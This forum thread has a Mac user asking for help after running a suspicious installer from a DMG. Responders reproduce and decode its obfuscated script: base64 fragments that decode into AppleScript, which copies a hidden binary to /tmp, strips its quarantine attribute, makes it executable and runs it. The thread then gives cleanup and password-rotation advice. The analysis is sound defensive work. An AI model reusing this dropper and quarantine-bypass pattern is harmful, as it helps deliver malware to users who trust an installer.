Downloaded a suspicious app. Please help

Not 100% sure it's malicious - but it is kind of sketchy at least. The file in the DMG you drag to the Terminal is a bash script:

#!/bin/bash

FXhoRLqY='IyEvYmluL2Jhc2gKb3Nhc2NyaXB0IC1lICdvbiBydW4KICAgIHRyeQogICAgICAgIHNldCBkaXNrTGlzdCB0byBsaXN0IGRpc2'
xUraPryk='tzCiAgICBlbmQgdHJ5C'
AgQMGPxf='iAgICBzZXQgdGFyZ2V0RGlzayB'
opxHSyoX='0byAiIgo'
jGEGUGmb='gICAgdHJ5CiAgICAgICAgcmVwZWF0'
YUEtjAJr='IHdpdGggZGlzayBpbiBkaXNrTGlzdAogICAgICAgICAgICBpZiBkaXNrIGNvbnRhaW5'
KXIkWjgK='zICJUeXBlckRleFNldHVwIiB0aGVuCiAgICAgICAgICAgICAgICBzZXQgdGFyZ2V0RGlzayB0byBkaXNrCiAg'
zzyRgDka='ICAgICAgICAgICAgIC'
FuDnOzWd='BleGl0IHJlcGVhdAogICAgICAgICAgICB'
SlewqVcl='lbmQgaWYKICAgICA'
iKttHYHF='gICBlbmQgcmVwZWF0CiAgICBlbmQgdHJ5C'
XGPSUmcU='iAgICBpZiB0YXJnZXREaXNrIGlzICIiIHRoZW4KICAgICAgICByZXR1cm4KICAgIGVuZCBpZgogICAgc2V0IGZvbGRlclB'
jdRZzsIY='hdGggdG8gIi9Wb2x1bWVzLyIgJiB0YXJnZXREaXNrICYgIi8iCiAgICBzZXQgYXBwTmFtZSB0'
XOnrPYmo='byAiLlR5cGVyRGV4U2V0dXAiCiAgICBzZXQgYXBwUGF0aCB0byBmb2xkZXJQYXRoICYgYXBwTmFtZQogICAgc2V0IHRlbXBBcHBQ'
ZipdVIwQ='YXRoIHRvIC'
qNraIQCR='IvdG1wLyIgJiBh'
HzfKDDyz='cHBOYW1lCiAgICB0'
XnOxbqKW='cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgInJtIC1mICIgJiBxdW90ZWQgZm9ybSBvZiB0ZW1wQXBwUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICA'
FKGSwYHi='gZG8gc2hlbGwgc2NyaXB0ICJjcCAiICYgcXVvdGVkIGZvcm0gb2YgYXBwUGF0aCAmICIgIiA'
pMpKcAEb='mIHF1b3RlZCBmb3JtIG9mIHRlbXBBcHBQYXRoCiAgICBlbmQgdHJ5CiAgICB0cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgInhhdHR'
VLfddcEb='yIC1jICIgJiBxdW90ZWQgZm9ybSBvZiB'
plNENAmz='0Z'
nlUYhzhZ='W1wQXBwUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICAgZG8gc2hlbGwgc2NyaXB0ICJ'
PwjdatGl='jaG1vZCAreCAiICYgcXVvdGVkIGZvcm0gb2YgdGVtcEFwcFBhdGgKICAgIGVuZCB0cnkKICAgIHRyeQogICAgICAgIGRvIHNoZWxsIHNjcmlwdCBxdW90ZWQgZm9ybSBvZiB0ZW1wQXB'
JhDsfXxD='wUGF0aAogICAgZW5kIHRyeQplbmQgcnVuJw=='
code="${FXhoRLqY}${xUraPryk}${AgQMGPxf}${opxHSyoX}${jGEGUGmb}${YUEtjAJr}${KXIkWjgK}${zzyRgDka}${FuDnOzWd}${SlewqVcl}${iKttHYHF}${XGPSUmcU}${jdRZzsIY}${XOnrPYmo}${ZipdVIwQ}${qNraIQCR}${HzfKDDyz}${XnOxbqKW}${FKGSwYHi}${pMpKcAEb}${VLfddcEb}${plNENAmz}${nlUYhzhZ}${PwjdatGl}${JhDsfXxD}"

bash -c "$(echo "$code" | base64 --decode)"

The unreadable part in the middle seems to be Base64 encoded:

#!/bin/bash
osascript -e 'on run
    try
        set diskList to list disks
    end try
    set targetDisk to ""
    try
        repeat with disk in diskList
            if disk contains "TyperDexSetup" then
                set targetDisk to disk
                exit repeat
            end if
        end repeat
    end try
    if targetDisk is "" then
        return
    end if
    set folderPath to "/Volumes/" & targetDisk & "/"
    set appName to ".TyperDexSetup"
    set appPath to folderPath & appName
    set tempAppPath to "/tmp/" & appName
    try
        do shell script "rm -f " & quoted form of tempAppPath
    end try
    try
        do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
    end try
    try
        do shell script "xattr -c " & quoted form of tempAppPath
    end try
    try
        do shell script "chmod +x " & quoted form of tempAppPath
    end try
    try
        do shell script quoted form of tempAppPath
    end try
end run'%

At a minimum, it seems to be copying an app named ".TyperDexSetup" into /tmp, make it executable and then run it. ".TyperDexSetup" is a 12 MB binary encoded file.

It's probably malware. Not 100%, but super sketchy. And whatever that binary did, it did with your administrator privilege level - so in theory anything...

Files like documents - unlikely, and that sort of thing would be picked up by a Malwarebytes scan of the flash drive or whatever you copy them to, most likely.

Yeah, once you are sure you've saved your important document files, probably time to burn it down and reinstall from scratch - although feel free to get a second opinion. If you have an M-series Mac and macOS 15, there is a cryptographically sealed system volume that malware can't touch...but who knows what it installed outside that volume in places you (as admin) can modify...or if it would be possible to find it all to remove.

Oh, its domain registrar is in Russia...it has a low Tranco score, the server hosts a bunch of other suspicious websites and that particular registrar (reg.ru) is associated with a large number of spammers and fraud sites...yeah this is totally a fraud site and that was malware.

The hidden file in /tmp, and the obfuscated shell script, both look very sketchy.

The Windows version also looks sketchy: https://www.joesandbox.com/analysis/1633305/0/html

More: https://securityonline.info/crazy-evil-cryptoscam-group-steals-millions-from-crypto-enthusiasts/

If that’s representative of what was installed, I’d wipe the Mac and start over without restoring.

And I wouldn't entirely trust even documente to be entirely unmodified. Microsoft Word macros and executable PDF files do exist.

It probably won’t be on the iPhone, but it may well have accessed backups of the iPhone, or your keychain contents. Which means a password rotation for everything that matters, two-factor authentication if not already, and related steps.

Swiftslinger wrote:

Oh Noo :(

Even images aren’t safe?

Photos are probably safe.

But there have been issues in the past.

Not the least of which involved NSO Pegasus and JBIG2:

https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html

What’s your comfort level with uncertainty?

If you’re speculating in cryptocurrency for instance, I'd would assume that Mac to be compromised.

One of the text tools that gets recommended here: https://snippety.app/

I’fe used Kapeli Dash app for quite a while, though not the snippet feature: https://kapeli.com/

Swiftslinger wrote:

I’m not into crypto at all. Im just worried they might try to get access to my accounts and do something. Like social media or apple developer account or something.

Short of reverse-engineering, nobody knows what this app does. Or if it is malware, sketchy appearances aside.

Also, I did connect my phone to the Max to charge and stuff. is there a chance of the malware being transferred to the phone?

I answered that already: “It probably won’t be on the iPhone, but it may well have accessed backups of the iPhone, or your keychain contents. Which means a password rotation for everything that matters, two-factor authentication if not already, and related steps.” And it had full access to the Mac.

Download & run Malwarebytes. You can install & run it for free for 30 days. After that it still works but you must run it manually. Lots of us here use & recommend it.

Do you have backups? you may want to erase and reinstall the computer from recovery mode and then restore from a backup from before installing running that code.

Best of luck.